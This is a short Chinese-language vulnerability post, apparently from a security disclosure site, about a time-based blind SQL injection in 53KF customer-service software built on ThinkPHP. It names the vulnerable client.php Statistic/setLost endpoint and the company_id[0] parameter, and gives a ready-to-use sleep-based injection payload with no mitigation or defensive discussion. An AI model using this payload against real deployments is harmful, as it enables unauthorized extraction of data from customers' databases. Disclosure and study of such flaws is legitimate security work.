利用过程:
53KF 采用ThinkPHP框架,
注入地址:http://xxx.com/new/client.php?m=Statistic&a=setLost&field=chat_robot_lost&type=plus&company_id[0]=1,company_id[0]存在时间盲注

payload:
/new/client.php?m=Statistic&a=setLost&field=chat_robot_lost&type=plus&company_id[0]=-1%20or%201!=sleep(5)))limit%201%23between

暂无评论